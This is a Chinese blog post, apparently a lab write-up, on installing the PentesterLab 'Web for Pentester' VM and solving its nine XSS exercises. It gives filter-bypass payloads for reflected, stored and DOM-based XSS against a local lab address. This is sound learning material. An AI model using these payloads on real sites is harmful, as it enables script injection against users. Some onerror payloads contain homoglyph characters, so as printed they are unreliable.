web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。

下载链接及文档说明:

http://pentesterlab.com/exercises/web_for_pentester/

【安装流程】

1. 虚拟机中挂载镜像。 下载好ios镜像之后,在虚拟机中创建新系统。

一路向下,创建虚拟系统。

点击启动,选择iso镜像,即可启动。

2. 设置网络。 关掉刚刚开启的系统。

点击设置,选择网络选项。如图所示设置网络

3.启动系统。输入ifconfig

可以看到我们虚拟机的IP地址为http://192.168.56.101/  不同的系统可能不一样

如果想让主机访问虚拟机,必须让主机和虚拟机在同一网段的范围内。

所以在主机上打开网络和共享中心,设置IP

根据我的虚拟机IP,我给本机设置的IP如下:

4.在主机浏览器输入虚拟机IP,我这儿是http://192.168.56.101/  ,即可通过HTTP访问虚拟机了!!

【XSS部分解析】

xss example1:

完全没有过滤或者编码,各种姿势的玩~

name=<script>alert('bb')</script>

xss example2:

从这里可以看到,过滤掉了<script>标签,我们试试大小写?

name=<Script>alert('bb')</sCript>

嗯,大小写绕过了

xss example3:

和上一张图一样,<script>标签被过滤掉了

先试试 name=la<script>la,输出hello,lala

name=<scri<script>pt>alert('bb')</scri</script>pt>

经测试这个在实例2也是可以用的

xss example4:

先输入最基本的测试name=<script>alert('bb')</script>

竟然输出error了!

换个标签? name=<img>?这次没error。补全补全~

name=<img src="1" οnerrοr="alert('bb')">

成功了~~经测试这个payload在前三个应该也是可以的

xss example5:

先输入name=<img>正常显示

补全name=<img src="1" οnerrοr="alert('bb')"> 输出error

发现alert被过滤掉了- -但是其他的函数还可以用,

比如说name=<img src="1" οnerrοr="confirm('aa')">

查了一下文档,发现可以这样写

name=<img src="1" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,39,97,39,41))">

这个世界真神奇

xss example6:

查看元素,发现输出竟然在script标签中。

$a="<img  src="1" οnerrοr="alert('bb')">"

输出在script标签中的情况要首先闭合双引号"

name=fdf";alert($a);//

xss example7:

审查元素:

<script>
var $a= 'fdf&quot;;alert($a);//';
</script>

发现双引号被HTMLEncode了

- -还发现$a=''这个地方变成了单引号。。。稍微改一下

name=fdf';alert($a);//

成了

xss example8:

呦,终于长进了,变成存储型的了~

随便输出个名字<script>alert('a')</script>

审查元素

HELLO &lt;script&gt;alert('a')&lt;/script&gt;

<>被HTMLEncode了。

对于输出在HTML中的内容,这样的过滤已经是足够了。那么漏洞在哪儿呢?

经过答案的提醒- -我们发现form表的目标URL是可以被构造的

http://192.168.56.101/xss/example8.php/%22%20οnsubmit=%22alert('1')

在提交的时候,会触发弹窗

xss example9:

- -最后一个你是在逗我么

审查元素

<script>
document.write(location.hash.substring(1));
</script>

随便改改就好了。。http://192.168.56.101/xss/example9.php#<script>alert('1')</script>

注:官方答案地址:http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf

转载于:https://www.cnblogs.com/kuoaidebb/p/4002348.html

【web安全】第三弹:web攻防平台pentester安装及XSS部分答案解析相关推荐

  1. php三种web开发技术,三种WEB开发主流技术ASP-PHP-JSP的评价

    三种Web开发主流技术ASP-PHP-JSP的评价 [摘要]本文从程序开发者的角度,对现今社会盛行的WEB开发技术进行了分析,旨在让WEB 开发人员.使用者.准备学习的人对WEB开发技术有更加深入的了 ...

  2. 三、Zstack云平台快速安装与初始化(ZCCT云计算认证)

    一.如何准备安装环境,包括服务器.安装包及相关教程 1.准备安装环境 服务器环境准备 正式环境推荐服务器配置如下: 因为是学习安装,所以创建一个4C8GB,硬盘不小于40G的虚拟机即可.下图是官方视频 ...

  3. 解析时分秒_三年级上册,数学期中复习卷(含详细答案解析),有效提分,收藏...

    三年级上册,数学期中复习卷(含详细答案解析),有效提分,收藏 今天我们来梳理一下三年级上册数学的期中复习. 在第一单元<时分秒>中,关于时间的知识,同学们在小学一二年级都有所学习,一年级阶 ...

  4. 南京邮电大学网络攻防平台WriteUP——WEB(上)

    前言 南京邮电大学网络攻防平台(http://ctf.nuptsast.com/)是一个集合了WEB.MISC.密码学.PWN.逆向的一个CTF训练平台,对于初次涉及ctf小伙伴来说是非常不错的一个训 ...

  5. 猿人学web端爬虫攻防平台第七题动态字体

    本人呢很喜欢爬虫,但是技术不好,所以呢就一直慢慢的摸索着,也不知道那什么练手进行学习,直到我在偶然的机会接触到了猿人学,发现了 猿人学web端爬虫攻防平台这个网站,久旱逢甘霖,他乡遇故知呀(蹩脚的词语 ...

  6. W3AF:一个web应用安全的攻击、审计平台

    现在再给大家介绍一款GUI版WEB安全工具,W3AF是一个web应用安全的攻击.审计平台,通过增加插件来对功能进行扩展,这是一款用python写的工具,支持GUI,也支持命令行模式. W3AF目前已经 ...

  7. Web安全Day1 - SQL注入实战攻防

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 http ...

  8. 减少企业Web威胁的三条预防性措施

    减少企业Web威胁的三条预防性措施 http://netsecurity.51cto.com  2010-10-20 09:39  佚名  TT安全  我要评论(0) 摘要:在企业中我们更应该关注网络 ...

  9. Web前端第三阶段--DOM

    Web前端第三阶段–DOM 文章目录 Web前端第三阶段--DOM DOM树 初识DOM DOM作用 固定元素的读取 标签读取元素 CSS选择器读取元素 class操作 classList 简单实例 ...

最新文章

  1. SpringBoot中@ControlAdvice的使用
  2. 2016年CCPC/ICPC比赛总结
  3. JAVA框架Struts2
  4. 认证授权方案之授权初识
  5. python对列表中的字典的字段进行排序
  6. 【白皮书分享】2020中国美颜消费趋势白皮书.pdf(附下载链接)
  7. 记录.NET Core部署到Linux之.NET Core环境搭建(1)
  8. ubuntu14.04下svn版本管理系统的安装及常用命令的使用整理
  9. c语言例题22:日期计算
  10. Android :安卓学习笔记之 Handler机制 的简单理解和使用
  11. 在React中使用Shadow DOM
  12. error:crosses initialization of
  13. 景点门票销售系统系统java_《基于WEB的景点门票销售系统》.doc
  14. linux dbm数据库,linux dbm数据库
  15. 163邮箱登录入口你知道吗?163邮箱登录方法大全
  16. java递归处理单位人员组织机构树
  17. C/C++中argv[ ]与argc内容解读//(涉及运用cmd)
  18. 工厂生产线设备数据采集方法
  19. 智慧城市App解决方案
  20. 完善三维全栈产品布局 的卢深视用三维全栈技术点亮2020全球智博会

热门文章

  1. 鼠标右键转圈圈_win10系统右键一直转圈
  2. 【JQuery】 触发元素的change事件
  3. Tomcat9 无法启动组件[Connector[AJP/1.3-8009]]
  4. 【mysql】str_to_date()字符串转化为日期类型
  5. android oom 检测工具,Android中UI检测、内存泄露、OOM、等优化处理
  6. android使组件居中,Android图文居中显示控件使用方法详解
  7. php 打印函数调用栈,利用backtrace和backtrace_symbols函数打印调用栈信息
  8. 亲手完成4大企业实战项目,挑战Python全栈高薪岗位!
  9. java ubuntu 14.04,ubuntu14.04下安装JAVA
  10. python卸载不了怎么办说目录有错_错误:无法在安装目录中创建或删除文件